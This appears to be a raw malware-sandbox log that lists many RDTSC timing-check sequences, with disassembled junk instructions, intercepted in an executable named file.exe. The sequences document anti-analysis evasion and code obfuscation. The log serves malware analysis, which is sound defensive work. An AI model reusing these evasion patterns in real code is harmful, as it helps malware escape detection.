Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95BA90 second address: 95BA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C13E second address: 95C142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C142 second address: 95C152 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F848074395Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95C152 second address: 95C156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 960176 second address: 96017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96017C second address: 96018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F848150386Ah 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96018F second address: 9601B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F8480743937h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9601B2 second address: 9601B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96474C second address: 964750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964750 second address: 96477F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8481503889h 0x0000000c jmp 00007F8481503874h 0x00000011 jmp 00007F848150386Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96477F second address: 964789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 964AA4 second address: 964AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970623 second address: 970629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 970629 second address: 97064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503878h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97064B second address: 970668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97079C second address: 9707BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 jno 00007F8481503866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9734DF second address: 9734E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 973687 second address: 973696 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9817CC second address: 9817E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F8480743926h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98160C second address: 981644 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F848150386Eh 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop esi 0x00000014 jmp 00007F8481503873h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 981644 second address: 981660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8480743926h 0x00000009 jmp 00007F848074392Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 986951 second address: 98695B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8481503866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E464 second address: 98E46E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E5D1 second address: 98E5D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E5D7 second address: 98E5E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F8480743926h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E881 second address: 98E892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ch 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E892 second address: 98E8A0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8480743928h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E8A0 second address: 98E8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98EBB4 second address: 98EBCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8480743930h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9951E7 second address: 9951F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9951F8 second address: 995201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B203F second address: 9B2043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2043 second address: 9B2054 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnc 00007F8480743926h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B2054 second address: 9B206E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F8481503872h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B36DE second address: 9B36E8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5437 second address: 9B543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B543B second address: 9B5447 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5447 second address: 9B544D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B544D second address: 9B5451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5451 second address: 9B5473 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8481503878h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5473 second address: 9B5477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE783 second address: 9CE794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Ch 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF00D second address: 9CF014 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF014 second address: 9CF01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF156 second address: 9CF162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF43C second address: 9CF47F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8481503872h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8481503870h 0x00000011 jmp 00007F848150386Ch 0x00000016 jp 00007F8481503866h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF47F second address: 9CF492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848074392Bh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF492 second address: 9CF498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF498 second address: 9CF49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D22C2 second address: 9D22C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D22C6 second address: 9D22CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2374 second address: 9D2378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2378 second address: 9D237C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D237C second address: 9D2385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D25BA second address: 9D25C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D25C3 second address: 9D25C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D25C7 second address: 9D261C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add edx, dword ptr [ebp+12481D52h] 0x00000010 push 00000004h 0x00000012 jmp 00007F8480743937h 0x00000017 call 00007F8480743929h 0x0000001c jmp 00007F8480743934h 0x00000021 push eax 0x00000022 jo 00007F8480743949h 0x00000028 push eax 0x00000029 push edx 0x0000002a jnp 00007F8480743926h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D261C second address: 9D2645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jns 00007F8481503866h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D28FF second address: 9D295A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8480743933h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F8480743928h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1EFFh], ebx 0x0000002d push dword ptr [ebp+122D291Fh] 0x00000033 mov dword ptr [ebp+122D2099h], edi 0x00000039 call 00007F8480743929h 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ecx 0x00000042 pop ecx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D295A second address: 9D297B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F8481503872h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D297B second address: 9D297F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D297F second address: 9D29BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8481503871h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jno 00007F8481503874h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D29BB second address: 9D29BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D29BF second address: 9D29C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D29C3 second address: 9D29C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D3C47 second address: 9D3C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D7657 second address: 9D766C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F8480743926h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D766C second address: 9D7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0EF5 second address: 52D0EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0E6B second address: 52C0E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0E6F second address: 52C0E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0E75 second address: 52C0EA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503872h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8481503877h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0128 second address: 52A012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A012E second address: 52A016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F8481503872h 0x00000015 add si, 07F8h 0x0000001a jmp 00007F848150386Bh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A016F second address: 52A01AC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743938h 0x00000008 adc cx, E258h 0x0000000d jmp 00007F848074392Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov si, AB0Fh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, ecx 0x00000020 mov bx, si 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A01AC second address: 52A01E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8481503875h 0x00000008 movzx ecx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503876h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A01E3 second address: 52A0267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743931h 0x00000009 jmp 00007F848074392Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F8480743938h 0x00000015 add ax, 2BD8h 0x0000001a jmp 00007F848074392Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F848074392Bh 0x0000002e or ecx, 0B9EFE9Eh 0x00000034 jmp 00007F8480743939h 0x00000039 popfd 0x0000003a mov cx, 1267h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0267 second address: 52A0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503878h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0283 second address: 52A0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0287 second address: 52A029B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ch, 81h 0x00000010 movsx edx, cx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A029B second address: 52A02C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, 31F62796h 0x00000014 mov dx, 2722h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0B1D second address: 52C0B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8481503873h 0x00000013 and cx, 3DAEh 0x00000018 jmp 00007F8481503879h 0x0000001d popfd 0x0000001e call 00007F8481503870h 0x00000023 pop eax 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C05C7 second address: 52C05DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743930h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C05DB second address: 52C0618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F848150386Fh 0x00000012 or eax, 169E46EEh 0x00000018 jmp 00007F8481503879h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0618 second address: 52C0628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0628 second address: 52C064E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F8481503876h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C064E second address: 52C0654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C034E second address: 52C03FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f mov di, ax 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b mov bx, 9254h 0x0000001f pushfd 0x00000020 jmp 00007F848150386Dh 0x00000025 add eax, 156A5516h 0x0000002b jmp 00007F8481503871h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F848150386Ch 0x0000003a or al, 00000038h 0x0000003d jmp 00007F848150386Bh 0x00000042 popfd 0x00000043 call 00007F8481503878h 0x00000048 push eax 0x00000049 pop edi 0x0000004a pop esi 0x0000004b popad 0x0000004c mov ebp, esp 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F8481503878h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C03FE second address: 52C0404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52C0404 second address: 52C0408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53005AF second address: 53005B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
